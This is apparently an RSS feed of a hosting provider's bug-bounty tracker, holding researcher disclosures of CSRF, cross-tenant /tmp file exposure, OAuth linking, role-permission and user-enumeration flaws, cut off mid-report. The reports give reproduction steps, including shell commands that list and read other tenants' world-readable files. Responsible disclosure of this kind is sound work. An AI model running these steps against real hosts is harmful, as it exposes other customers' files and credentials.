<?xml version="1.0" ?>
<rdf:RDF xmlns:dc="http://purl.org/dc/elements/1.1/" 
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
  xmlns="http://purl.org/rss/1.0/"
  xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel rdf:about="https://security.alwaysdata.com/">
    <title>alwaysdata </title>
    <link>https://security.alwaysdata.com/</link>
    <description>alwaysdata Security vulnerabilities: Recently opened tasks</description>
    <dc:date>2026-07-03T08:34:51Z</dc:date>
    <items>
      <rdf:Seq>
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/365" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/363" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/362" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/361" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/360" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/359" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/358" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/357" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/356" />
                <rdf:li rdf:resource="https://security.alwaysdata.com/task/349" />
              </rdf:Seq>
    </items>
    		
  </channel>
    <item rdf:about="https://security.alwaysdata.com/task/365">
    <title>FS#365: Cross-Site Request Forgery (CSRF) in Notification &quot;Seen&quot; Endpoint Leads to Unauthorized Notification</title>
    <link>https://security.alwaysdata.com/task/365</link>
    <dc:date>2026-07-03T08:34:51Z</dc:date>
    <dc:creator>shankar biswas</dc:creator>
     <description>

Description



The application is vulnerable to Cross-Site Request Forgery (CSRF) on the notification &amp;quot;Seen&amp;quot; endpoint. An attacker can craft a malicious HTML page that silently triggers the notification &amp;quot;seen&amp;quot; request from a victim&amp;#039;s browser while the victim is authenticated.



Because the endpoint accepts the request without validating a CSRF token or verifying the request origin, the victim&amp;#039;s notification status is changed without their knowledge or consent.



Although this does not expose sensitive information, it allows unauthorized modification of user data, violating the integrity of the victim&amp;#039;s account.



CVSS v3.1 → Score: 4.3 (Medium)




Steps to Reproduce


 Login to Attacker Account (Account A) using Firefox.



 Navigate to Notifications.



 Ensure at least one notification is available.



 Enable Burp Suite Intercept.



 Click Seen on a notification.



 Capture the request.



 Send the request to Burp Engagement Tools.



 Generate a CSRF PoC.



 Modify the generated PoC by changing:




    method=&amp;quot;POST&amp;quot; to method=&amp;quot;GET&amp;quot; 


 Save the HTML file.



 Login to Victim Account (Account B) using another browser (Chrome).



 Ensure the victim has at least one unread notification.



 Open the generated CSRF PoC in the victim&amp;#039;s browser.



 Click Submit Request.



 Observe that the victim&amp;#039;s notification is automatically marked as Seen without the victim performing the action.




 Actual Behaviour


 The notification is marked as Seen in the victim&amp;#039;s account simply by visiting and submitting the attacker-controlled HTML page.



 No CSRF protection, Origin validation, or SameSite-based mitigation prevents the request.




 Expected Behaviour


 The server should reject any state-changing request that does not contain a valid CSRF token and should verify the request originates from a trusted source.



 Only the authenticated user performing the action from the legitimate application should be able to mark notifications as Seen.




 Impact


 Unauthorized modification of notification status.



 Attackers can manipulate notification state without user consent.



 Users may miss important notifications because they appear as already read.



 Demonstrates missing CSRF protection on a state-changing endpoint.



 Indicates other sensitive endpoints may also be vulnerable to CSRF.




 Business Impact 


 Loss of integrity of user account data.



 Important alerts, security notifications, or business messages may be marked as read without the user&amp;#039;s knowledge.



 Reduced user trust due to unauthorized account actions.



 Reveals a security control weakness that could affect higher-risk endpoints if the same protection is missing elsewhere.





Remediation 


 Implement anti-CSRF tokens for all state-changing requests.



 Validate the Origin and Referer headers.



 Use SameSite=Lax or preferably SameSite=Strict for session cookies where appropriate.



 Ensure endpoints that modify data only accept the intended HTTP method (e.g., POST) and cannot be invoked via GET.



 Follow the Synchronizer Token Pattern or another robust CSRF defense mechanism across the application.




 Video Proof of Concept:



Google Drive link → https://drive.google.com/drive/folders/1v9Y7TFbgv-FFztKX23aL_ZNkDu3GCqWT?usp=drive_link



Conclusion



The notification &amp;quot;Seen&amp;quot; endpoint lacks proper CSRF protection, allowing an attacker to force authenticated users to unknowingly mark their notifications as read. While the immediate impact is limited to unauthorized state modification, it represents a clear integrity issue and indicates that CSRF protections may be absent from other state-changing endpoints. Implementing standard CSRF defenses will prevent unauthorized cross-site requests and strengthen the application&amp;#039;s overall security posture.



Thanks

</description>
    <content:encoded><![CDATA[
<p>
<strong>Description</strong>
</p>

<p>
The application is vulnerable to Cross-Site Request Forgery (CSRF) on the notification &quot;Seen&quot; endpoint. An attacker can craft a malicious <acronym title="HyperText Markup Language">HTML</acronym> page that silently triggers the notification &quot;seen&quot; request from a victim&#039;s browser while the victim is authenticated.
</p>

<p>
Because the endpoint accepts the request without validating a CSRF token or verifying the request origin, the victim&#039;s notification status is changed without their knowledge or consent.
</p>

<p>
Although this does not expose sensitive information, it allows unauthorized modification of user data, violating the integrity of the victim&#039;s account.
</p>

<p>
<strong>CVSS v3.1 → Score: 4.3 (Medium)</strong>
</p>

<p>
<strong>
Steps to Reproduce</strong>
</p>
<ol>
<li class="level1"><div class="li"> Login to Attacker Account (Account A) using Firefox.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Navigate to Notifications.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Ensure at least one notification is available.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Enable Burp Suite Intercept.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Click Seen on a notification.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Capture the request.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Send the request to Burp Engagement Tools.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Generate a CSRF PoC.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Modify the generated PoC by changing:</div>
</li>
</ol>

<p>
    method=&quot;POST&quot; to method=&quot;GET&quot; 
</p>
<ol>
<li class="level1"><div class="li"> Save the <acronym title="HyperText Markup Language">HTML</acronym> file.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Login to Victim Account (Account B) using another browser (Chrome).</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Ensure the victim has at least one unread notification.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Open the generated CSRF PoC in the victim&#039;s browser.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Click Submit Request.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Observe that the victim&#039;s notification is automatically marked as Seen without the victim performing the action.</div>
</li>
</ol>

<p>
 <strong>Actual Behaviour</strong>
</p>
<ol>
<li class="level1"><div class="li"> The notification is marked as Seen in the victim&#039;s account simply by visiting and submitting the attacker-controlled <acronym title="HyperText Markup Language">HTML</acronym> page.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> No CSRF protection, Origin validation, or SameSite-based mitigation prevents the request.</div>
</li>
</ol>

<p>
 <strong>Expected Behaviour</strong>
</p>
<ol>
<li class="level1"><div class="li"> The server should reject any state-changing request that does not contain a valid CSRF token and should verify the request originates from a trusted source.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Only the authenticated user performing the action from the legitimate application should be able to mark notifications as Seen.</div>
</li>
</ol>

<p>
 <strong>Impact</strong>
</p>
<ol>
<li class="level1"><div class="li"> Unauthorized modification of notification status.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Attackers can manipulate notification state without user consent.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Users may miss important notifications because they appear as already read.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Demonstrates missing CSRF protection on a state-changing endpoint.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Indicates other sensitive endpoints may also be vulnerable to CSRF.</div>
</li>
</ol>

<p>
 <strong>Business Impact</strong> 
</p>
<ol>
<li class="level1"><div class="li"> Loss of integrity of user account data.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Important alerts, security notifications, or business messages may be marked as read without the user&#039;s knowledge.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Reduced user trust due to unauthorized account actions.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Reveals a security control weakness that could affect higher-risk endpoints if the same protection is missing elsewhere.</div>
</li>
</ol>

<p>
<strong>
Remediation</strong> 
</p>
<ol>
<li class="level1"><div class="li"> Implement anti-CSRF tokens for all state-changing requests.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Validate the Origin and Referer headers.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Use SameSite=Lax or preferably SameSite=Strict for session cookies where appropriate.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Ensure endpoints that modify data only accept the intended <acronym title="Hyper Text Transfer Protocol">HTTP</acronym> method (e.g., POST) and cannot be invoked via GET.</div>
</li>
</ol>
<ol>
<li class="level1"><div class="li"> Follow the Synchronizer Token Pattern or another robust CSRF defense mechanism across the application.</div>
</li>
</ol>

<p>
 <strong>Video Proof of Concept:</strong>
</p>

<p>
Google Drive link → <a href="https://drive.google.com/drive/folders/1v9Y7TFbgv-FFztKX23aL_ZNkDu3GCqWT?usp=drive_link" class="urlextern" title="https://drive.google.com/drive/folders/1v9Y7TFbgv-FFztKX23aL_ZNkDu3GCqWT?usp=drive_link"  rel="nofollow">https://drive.google.com/drive/folders/1v9Y7TFbgv-FFztKX23aL_ZNkDu3GCqWT?usp=drive_link</a>
</p>

<p>
<strong>Conclusion</strong>
</p>

<p>
The notification &quot;Seen&quot; endpoint lacks proper CSRF protection, allowing an attacker to force authenticated users to unknowingly mark their notifications as read. While the immediate impact is limited to unauthorized state modification, it represents a clear integrity issue and indicates that CSRF protections may be absent from other state-changing endpoints. Implementing standard CSRF defenses will prevent unauthorized cross-site requests and strengthen the application&#039;s overall security posture.
</p>

<p>
Thanks<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/363">
    <title>FS#363: Cross-tenant file disclosure via world-readable shared `/tmp` on alwaysdata SSH/web hosts</title>
    <link>https://security.alwaysdata.com/task/363</link>
    <dc:date>2026-07-02T15:08:15Z</dc:date>
    <dc:creator>Sayada Zannat Haque</dc:creator>
     <description>

Vulnerability Name: Cross-tenant file disclosure via world-readable shared `/tmp` on alwaysdata SSH/web hosts



Severity: HighCVSS 4.0 vector: `CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N`CVSS 4.0 score: ~8.2 (High)Target: `ssh-&amp;lt;account&amp;gt;.alwaysdata.net` (physical SSH host `ssh1`) and the web-application hosts (`http21`) — kernel `6.18.30-alwaysdata`Type: CWE-668 (Exposure of Resource to Wrong Sphere) / CWE-732 (Incorrect Permission Assignment) / CWE-200


Description



 On alwaysdata&amp;#039;s shared hosting infrastructure every customer account on a given physical host shares a single, non-polyinstantiated `/tmp` directory (mode `drwxrwxrwt` / `1777`), while the platform default umask is `022` — so any file a customer writes into `/tmp` is created world-readable (`644`).



Account isolation on these hosts is enforced only by cgroups + per-account Unix UIDs, and SSH is explicitly not chrooted (per alwaysdata&amp;#039;s own documentation). As a result, any customer — on any plan, including the free plan — can read any other customer&amp;#039;s world-readable files in `/tmp` on the same physical host. This is a cross-tenant confidentiality boundary violation: it lets a low-privileged tenant passively harvest other tenants&amp;#039; source code, configuration, and temporary artifacts.



The condition is confirmed on both the SSH tier (`ssh1`) and the web-application tier (`http21`), indicating it is fleet-wide. (Note: PHP `session.save_path` is per-account, so live sessions are not exposed — which bounds this at High rather than Critical.)



 Exposed Endpoints / Affected Components 


	
		 Host / component  Path  Mode  Issue 
	
	
		————
	
	
		 SSH host `ssh1`  `/tmp`  `1777` (shared, not polyinstantiated)  other tenants&amp;#039; world-readable files readable 
	
	
		 Web host `http21`  `/tmp`  `1777` (shared)  same exposure on the web tier 
	
	
		 Platform default  umask  `022`  new `/tmp` files created world-readable (`644`) 
	



Steps to Reproduce



Requires two accounts you control (`A` and `B`, different customers) that land on the same physical host. In this report `A` = `steve-william` (uid 530469), `B` = `test-domain` (uid 530478), both on `ssh1`.



1. Create two free alwaysdata accounts with different emails; enable SSH on each (Remote access → SSH).2. SSH into account A: `ssh A@ssh-A.alwaysdata.net`.3. As A, write a file into the shared `/tmp` (created world-readable due to default umask 022):

 `echo &amp;quot;SECRET_OF_A&amp;quot; &amp;gt; /tmp/canary_A.txt`


4. In a second terminal, SSH into account B (a *different* customer): `ssh B@ssh-B.alwaysdata.net`.5. As B, confirm you are a different UID on the same host: `id; hostname`.6. As B, read account A&amp;#039;s file: `cat /tmp/canary_A.txt` → A&amp;#039;s content is returned. 7. Enumerate the real cross-tenant exposure (metadata only): `find /tmp -maxdepth 1 -type f ! -user &amp;quot;$(id -un)&amp;quot; -readable`.



Observed live: as account B, 65 files across 12 other live customer accounts were readable, including source archives (`*.tgz`), a config script (`inject_config.py`), an Omeka DB env file (`omeka_db_env_*`), financial PDFs, and cryptocurrency wallet backups. (No third-party file *content* was read — only names/owners/permissions were enumerated, per program rules.)



Proof of Concept (PoC)



Bash PoC Script, Python PoC Script, and other attachments are attached.




Impact



 - Cross-tenant confidentiality breach affecting all customers sharing the same physical host.- On the affected host (`ssh1`), approximately 882 customer home directories are co-located, allowing tenants to access world-readable temporary files belonging to other customers.- Sensitive information that may be exposed includes source code, configuration files, temporary application data, and other confidential files.- If a world-readable `.env` or configuration file contains database credentials, an attacker could use those credentials to access the victim&amp;#039;s remotely reachable database (e.g., `mysql-&amp;lt;account&amp;gt;.alwaysdata.net:3306` or `postgresql-&amp;lt;account&amp;gt;.alwaysdata.net:5432`).- This could lead to unauthorized access to another customer&amp;#039;s database and the data stored within it.- No other customers&amp;#039; files, credentials, or databases were accessed during testing. The impact assessment is based solely on the demonstrated file exposure and the resulting attack path.




Remediation



 - Polyinstantiate `/tmp` (and `/var/tmp`) per account — e.g. `pam_namespace` with per-account instances, or a per-account-namespace private `tmpfs` — so each tenant sees an isolated `/tmp`.- And/or set the platform default umask to `077`.- Optionally enable `fs.protected_regular=2` and per-account `/tmp` reaping.



</description>
    <content:encoded><![CDATA[
<p>
<strong>Vulnerability Name:</strong> Cross-tenant file disclosure via world-readable shared `/tmp` on alwaysdata <acronym title="Secure Shell">SSH</acronym>/web hosts
</p>

<p>
<strong>Severity:</strong> High<br /><strong>CVSS 4.0 vector:</strong> `CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N`<br /><strong>CVSS 4.0 score:</strong> ~8.2 (High)<br /><strong>Target:</strong> `ssh-&lt;account&gt;.alwaysdata.net` (physical <acronym title="Secure Shell">SSH</acronym> host `ssh1`) and the web-application hosts (`http21`) — kernel `6.18.30-alwaysdata`<br /><strong>Type:</strong> CWE-668 (Exposure of Resource to Wrong Sphere) / CWE-732 (Incorrect Permission Assignment) / CWE-200
</p>

<h5 id="description">Description</h5>
<div class="level5">

<p>
 On alwaysdata&#039;s shared hosting infrastructure every customer account on a given physical host shares a <strong>single, non-polyinstantiated `/tmp`</strong> directory (mode `drwxrwxrwt` / `1777`), while the platform <strong>default umask is `022`</strong> — so any file a customer writes into `/tmp` is created world-readable (`644`).
</p>

<p>
Account isolation on these hosts is enforced only by cgroups + per-account Unix UIDs, and <acronym title="Secure Shell">SSH</acronym> is explicitly <strong>not chrooted</strong> (per alwaysdata&#039;s own documentation). As a result, <strong>any customer — on any plan, including the free plan — can read any other customer&#039;s world-readable files in `/tmp` on the same physical host.</strong> This is a cross-tenant confidentiality boundary violation: it lets a low-privileged tenant passively harvest other tenants&#039; source code, configuration, and temporary artifacts.
</p>

<p>
The condition is confirmed on both the <acronym title="Secure Shell">SSH</acronym> tier (`ssh1`) and the web-application tier (`http21`), indicating it is fleet-wide. (Note: <acronym title="Hypertext Preprocessor">PHP</acronym> `session.save_path` is per-account, so live sessions are <strong>not</strong> exposed — which bounds this at High rather than Critical.)
</p>

<p>
 <strong>Exposed Endpoints / Affected Components</strong> 
</p>
<table class="inline">
	<tr>
		<td> Host / component </td><td> Path </td><td> Mode </td><td> Issue </td>
	</tr>
	<tr>
		<td>—</td><td>—</td><td>—</td><td>—</td>
	</tr>
	<tr>
		<td> <acronym title="Secure Shell">SSH</acronym> host `ssh1` </td><td> `/tmp` </td><td> `1777` (shared, not polyinstantiated) </td><td> other tenants&#039; world-readable files readable </td>
	</tr>
	<tr>
		<td> Web host `http21` </td><td> `/tmp` </td><td> `1777` (shared) </td><td> same exposure on the web tier </td>
	</tr>
	<tr>
		<td> Platform default </td><td> umask </td><td> `022` </td><td> new `/tmp` files created world-readable (`644`) </td>
	</tr>
</table>

<p>
<strong>Steps to Reproduce</strong>
</p>

<p>
Requires two accounts you control (`A` and `B`, different customers) that land on the same physical host. In this report `A` = `steve-william` (uid 530469), `B` = `test-domain` (uid 530478), both on `ssh1`.
</p>

<p>
1. Create two free alwaysdata accounts with different emails; enable <acronym title="Secure Shell">SSH</acronym> on each (Remote access → <acronym title="Secure Shell">SSH</acronym>).<br />2. <acronym title="Secure Shell">SSH</acronym> into account <strong>A</strong>: `ssh A@ssh-A.alwaysdata.net`.<br />3. As <strong>A</strong>, write a file into the shared `/tmp` (created world-readable due to default umask 022):
</p>
<pre class="code"> `echo &quot;SECRET_OF_A&quot; &gt; /tmp/canary_A.txt`</pre>

<p>
4. In a second terminal, <acronym title="Secure Shell">SSH</acronym> into account <strong>B</strong> (a *different* customer): `ssh B@ssh-B.alwaysdata.net`.<br />5. As <strong>B</strong>, confirm you are a different UID on the same host: `id; hostname`.<br />6. As <strong>B</strong>, read account A&#039;s file: `cat /tmp/canary_A.txt` → <strong>A&#039;s content is returned.</strong> 7. Enumerate the real cross-tenant exposure (metadata only): `find /tmp -maxdepth 1 -type f ! -user &quot;$(id -un)&quot; -readable`.
</p>

<p>
Observed live: as account B, <strong>65 files across 12 other live customer accounts</strong> were readable, including source archives (`*.tgz`), a config script (`inject_config.py`), an Omeka DB env file (`omeka_db_env_*`), financial PDFs, and cryptocurrency wallet backups. (No third-party file *content* was read — only names/owners/permissions were enumerated, per program rules.)
</p>

<p>
<strong>Proof of Concept (PoC)</strong>
</p>

<p>
Bash PoC Script, Python PoC Script, and other attachments are attached.
</p>

</div>

<h5 id="impact">Impact</h5>
<div class="level5">

<p>
 - Cross-tenant confidentiality breach affecting all customers sharing the same physical host.<br />- On the affected host (`ssh1`), approximately 882 customer home directories are co-located, allowing tenants to access world-readable temporary files belonging to other customers.<br />- Sensitive information that may be exposed includes source code, configuration files, temporary application data, and other confidential files.<br />- If a world-readable `.env` or configuration file contains database credentials, an attacker could use those credentials to access the victim&#039;s remotely reachable database (e.g., `mysql-&lt;account&gt;.alwaysdata.net:3306` or `postgresql-&lt;account&gt;.alwaysdata.net:5432`).<br />- This could lead to unauthorized access to another customer&#039;s database and the data stored within it.<br />- No other customers&#039; files, credentials, or databases were accessed during testing. The impact assessment is based solely on the demonstrated file exposure and the resulting attack path.
</p>

</div>

<h5 id="remediation">Remediation</h5>
<div class="level5">

<p>
 - Polyinstantiate `/tmp` (and `/var/tmp`) per account — e.g. `pam_namespace` with per-account instances, or a per-account-namespace private `tmpfs` — so each tenant sees an isolated `/tmp`.<br />- And/or set the platform default umask to `077`.<br />- Optionally enable `fs.protected_regular=2` and per-account `/tmp` reaping.
</p>

</div>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/362">
    <title>FS#362: Email Verification Bypass via Google OAuth Account Linking</title>
    <link>https://security.alwaysdata.com/task/362</link>
    <dc:date>2026-07-02T07:18:50Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Dear Security Team, I hope you are doing well. I would like to responsibly disclose a potential authentication and account-linking issue identified during testing of the Google OAuth login functionality. Vulnerability Summary Category: Authentication / Improper Account Verification Severity: High Description During testing, I observed that an account created using the traditional email and password registration process could be linked with a Google OAuth identity before the email address had been verified. Although the application continued to enforce email verification for password-based authentication, the Google OAuth account was successfully associated with the unverified profile. This behavior suggests that OAuth account linking occurs without first confirming that the email ownership verification process has been completed. Additionally, after the OAuth linking process, the application redirected to an OAuth callback endpoint that returned a 404 Page Not Found response, indicating an inconsistency in the authentication workflow. Steps to Reproduce



Register a new account using Email and Password.Do not verify the email address.Log out of the account.Select Sign in with Google.Authenticate using the same Google account associated with the registered email address.Observe that the application sends the following notification: A (Google) OAuth connection has been configured on your profile.Follow the OAuth authentication flow.The application redirects to: /oauth/google/callback/Observe that the endpoint returns: 404 - Page Not FoundOpen a new browser session and attempt to log in using the original email and password.The application still requires email verification before allowing password-based authentication. Observed Behavior • Google OAuth successfully links to the account before email verification is completed. • Email/password authentication continues to require email verification. • OAuth callback results in a 404 response, indicating an incomplete or inconsistent authentication flow. Expected Behavior The application should verify ownership of the registered email address before permitting external identity providers (such as Google OAuth) to be linked with the account, unless this behavior is explicitly intended. If OAuth login is intended to satisfy email ownership verification, the application should consistently mark the account as verified and complete the authentication flow without errors. Security Impact Depending on the intended authentication design, this behavior may result in: • Inconsistent authentication state. • Improper account-linking logic. • Potential bypass of email verification requirements. • Confusion regarding account ownership validation. • Increased attack surface if account-linking validation is not consistently enforced. Although I did not observe direct account takeover during testing, the current behavior indicates that the account verification and OAuth linking processes may not be consistently enforced. Recommendation I recommend reviewing the OAuth account-linking workflow to ensure that: • Email ownership verification is consistently enforced before linking external identity providers, or • Successful OAuth authentication is explicitly treated as verified email ownership and the account state is updated accordingly. • OAuth callback endpoints are correctly configured to prevent unexpected 404 responses. • Account verification logic remains consistent across all supported authentication methods. Conclusion The observed behavior suggests an inconsistency between the traditional email verification process and Google OAuth account linking. Reviewing the authentication workflow and enforcing consistent account verification logic will help reduce the risk of authentication-related issues and improve the overall security posture of the platform. This report is submitted under responsible disclosure. I would be happy to provide any additional information or assist with validation if required. Kind regards, Cyber_Subhash

</description>
    <content:encoded><![CDATA[
<p>
Dear Security Team, I hope you are doing well. I would like to responsibly disclose a potential authentication and account-linking issue identified during testing of the Google OAuth login functionality. Vulnerability Summary Category: Authentication / Improper Account Verification Severity: High Description During testing, I observed that an account created using the traditional email and password registration process could be linked with a Google OAuth identity before the email address had been verified. Although the application continued to enforce email verification for password-based authentication, the Google OAuth account was successfully associated with the unverified profile. This behavior suggests that OAuth account linking occurs without first confirming that the email ownership verification process has been completed. Additionally, after the OAuth linking process, the application redirected to an OAuth callback endpoint that returned a 404 Page Not Found response, indicating an inconsistency in the authentication workflow. Steps to Reproduce
</p>

<p>
Register a new account using Email and Password.<br />Do not verify the email address.<br />Log out of the account.<br />Select Sign in with Google.<br />Authenticate using the same Google account associated with the registered email address.<br />Observe that the application sends the following notification: A (Google) OAuth connection has been configured on your profile.<br />Follow the OAuth authentication flow.<br />The application redirects to: /oauth/google/callback/<br />Observe that the endpoint returns: 404 - Page Not Found<br />Open a new browser session and attempt to log in using the original email and password.<br />The application still requires email verification before allowing password-based authentication. Observed Behavior • Google OAuth successfully links to the account before email verification is completed. • Email/password authentication continues to require email verification. • OAuth callback results in a 404 response, indicating an incomplete or inconsistent authentication flow. Expected Behavior The application should verify ownership of the registered email address before permitting external identity providers (such as Google OAuth) to be linked with the account, unless this behavior is explicitly intended. If OAuth login is intended to satisfy email ownership verification, the application should consistently mark the account as verified and complete the authentication flow without errors. Security Impact Depending on the intended authentication design, this behavior may result in: • Inconsistent authentication state. • Improper account-linking logic. • Potential bypass of email verification requirements. • Confusion regarding account ownership validation. • Increased attack surface if account-linking validation is not consistently enforced. Although I did not observe direct account takeover during testing, the current behavior indicates that the account verification and OAuth linking processes may not be consistently enforced. Recommendation I recommend reviewing the OAuth account-linking workflow to ensure that: • Email ownership verification is consistently enforced before linking external identity providers, or • Successful OAuth authentication is explicitly treated as verified email ownership and the account state is updated accordingly. • OAuth callback endpoints are correctly configured to prevent unexpected 404 responses. • Account verification logic remains consistent across all supported authentication methods. Conclusion The observed behavior suggests an inconsistency between the traditional email verification process and Google OAuth account linking. Reviewing the authentication workflow and enforcing consistent account verification logic will help reduce the risk of authentication-related issues and improve the overall security posture of the platform. This report is submitted under responsible disclosure. I would be happy to provide any additional information or assist with validation if required. Kind regards, Cyber_Subhash<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/361">
    <title>FS#361: Broken Access Control / Improper Authorization</title>
    <link>https://security.alwaysdata.com/task/361</link>
    <dc:date>2026-07-02T07:17:14Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Dear Security Team, I hope you are doing well. I would like to responsibly disclose a potential access control issue identified during testing of the user role and permission management functionality. Category: Broken Access Control / Improper Authorization Severity: High Description During testing, I observed that a user assigned only the Billing Contact role is able to invite additional users to the organization. Based on the role description, the Billing Contact permission is intended to provide access to billing-related functionality. However, the ability to invite new users appears to extend beyond the expected responsibilities of a billing-only role. This behavior may violate the Principle of Least Privilege by allowing a non-administrative user to perform account management actions. Steps to Reproduce



Log in as an account administrator.Invite a new user with only the Billing Contact permission.Log in using the Billing Contact account.Navigate to the user or team management section.Observe that the Billing Contact user is able to access the Invite User functionality.Successfully initiate an invitation for another user. Expected Behavior A user assigned only the Billing Contact role should be restricted to billing-related operations and should not be able to invite or manage additional users unless explicitly intended by the role design. Actual Behavior The Billing Contact role is able to invite new users despite being intended for billing-related access. Security Impact If this behavior is not intended, it may allow: • Unauthorized user invitations. • Expansion of account access without administrator approval. • Circumvention of role separation. • Violation of the Principle of Least Privilege. • Increased risk of unauthorized account access. The overall impact depends on the permissions that can be granted to invited users. If elevated roles can be assigned, the security impact could be significantly higher. Recommendation To mitigate this issue, I recommend: • Restricting the Invite User functionality to administrative or dedicated user-management roles. • Reviewing role-based access control (RBAC) permissions to ensure Billing Contact users are limited to billing operations only. • Enforcing server-side authorization checks for all user management actions. • Verifying that non-administrative roles cannot perform account management functions unless explicitly intended. Conclusion The observed behavior suggests that the Billing Contact role may have broader privileges than expected by allowing user invitations. If this is not intended behavior, restricting user management capabilities to authorized administrative roles would improve the application’s access control model and better align with the Principle of Least Privilege. This report is submitted under responsible disclosure. I would be happy to provide additional information or assist with validation if required. Kind regards, Cyber_Subhash Security Researcher

</description>
    <content:encoded><![CDATA[
<p>
Dear Security Team, I hope you are doing well. I would like to responsibly disclose a potential access control issue identified during testing of the user role and permission management functionality. Category: Broken Access Control / Improper Authorization Severity: High Description During testing, I observed that a user assigned only the Billing Contact role is able to invite additional users to the organization. Based on the role description, the Billing Contact permission is intended to provide access to billing-related functionality. However, the ability to invite new users appears to extend beyond the expected responsibilities of a billing-only role. This behavior may violate the Principle of Least Privilege by allowing a non-administrative user to perform account management actions. Steps to Reproduce
</p>

<p>
Log in as an account administrator.<br />Invite a new user with only the Billing Contact permission.<br />Log in using the Billing Contact account.<br />Navigate to the user or team management section.<br />Observe that the Billing Contact user is able to access the Invite User functionality.<br />Successfully initiate an invitation for another user. Expected Behavior A user assigned only the Billing Contact role should be restricted to billing-related operations and should not be able to invite or manage additional users unless explicitly intended by the role design. Actual Behavior The Billing Contact role is able to invite new users despite being intended for billing-related access. Security Impact If this behavior is not intended, it may allow: • Unauthorized user invitations. • Expansion of account access without administrator approval. • Circumvention of role separation. • Violation of the Principle of Least Privilege. • Increased risk of unauthorized account access. The overall impact depends on the permissions that can be granted to invited users. If elevated roles can be assigned, the security impact could be significantly higher. Recommendation To mitigate this issue, I recommend: • Restricting the Invite User functionality to administrative or dedicated user-management roles. • Reviewing role-based access control (RBAC) permissions to ensure Billing Contact users are limited to billing operations only. • Enforcing server-side authorization checks for all user management actions. • Verifying that non-administrative roles cannot perform account management functions unless explicitly intended. Conclusion The observed behavior suggests that the Billing Contact role may have broader privileges than expected by allowing user invitations. If this is not intended behavior, restricting user management capabilities to authorized administrative roles would improve the application’s access control model and better align with the Principle of Least Privilege. This report is submitted under responsible disclosure. I would be happy to provide additional information or assist with validation if required. Kind regards, Cyber_Subhash Security Researcher<br />
</p>
]]></content:encoded>
  </item>
    <item rdf:about="https://security.alwaysdata.com/task/360">
    <title>FS#360: User Enumeration via Password Reset Functionality</title>
    <link>https://security.alwaysdata.com/task/360</link>
    <dc:date>2026-07-02T07:15:23Z</dc:date>
    <dc:creator>Subhash Kumawat</dc:creator>
     <description>

Dear Security Team,



I hope you are doing well.



I would like to responsibly disclose a security issue identified in the password reset functionality of your application. During testing, I observed that the application returns different responses for registered and non-registered email addresses, which allows an attacker to determine whether a specific email address is associated with a valid user account.



Severity:Medium



Category: Information Disclosure / User Enumeration



Description



The password reset endpoint responds differently based on whether the submitted email address exists in the system.



When a registered email address is entered, the application returns a successful password reset response. However, when an unregistered email address is submitted, the application returns a different error message indicating that the email address does not exist.



This behavior enables an attacker to enumerate valid user accounts by submitting multiple email addresses and comparing the application’s responses.



Steps to Reproduce



Navigate to the **Forgot Password page.Enter a valid, registered email address.Observe the success response indicating that a password reset email has been sent.Repeat the process using an email address that is not registered.Observe that the application returns a different response indicating that the email address does not exist.Compare both responses and note that they reveal whether an email address is registered.Proof of Concept



Registered Email



Email: registered@example.com



Response:&amp;quot;If an account exists, a password reset link has been sent.&amp;quot;Unregistered Email



Email: randomuser@example.com



Response:&amp;quot;Email address not found.&amp;quot;The difference in these responses allows an attacker to identify valid user accounts.



Security Impact



An attacker can exploit this behavior to:



Enumerate valid user accounts. Identify registered email addresses. Facilitate targeted phishing campaigns. Support credential stuffing or password spraying attacks. Gather intelligence for further attacks against identified users.



Although this issue does not directly expose user credentials, it increases the effectiveness of subsequent attacks by revealing valid account information.



Recommendation



To mitigate this issue:



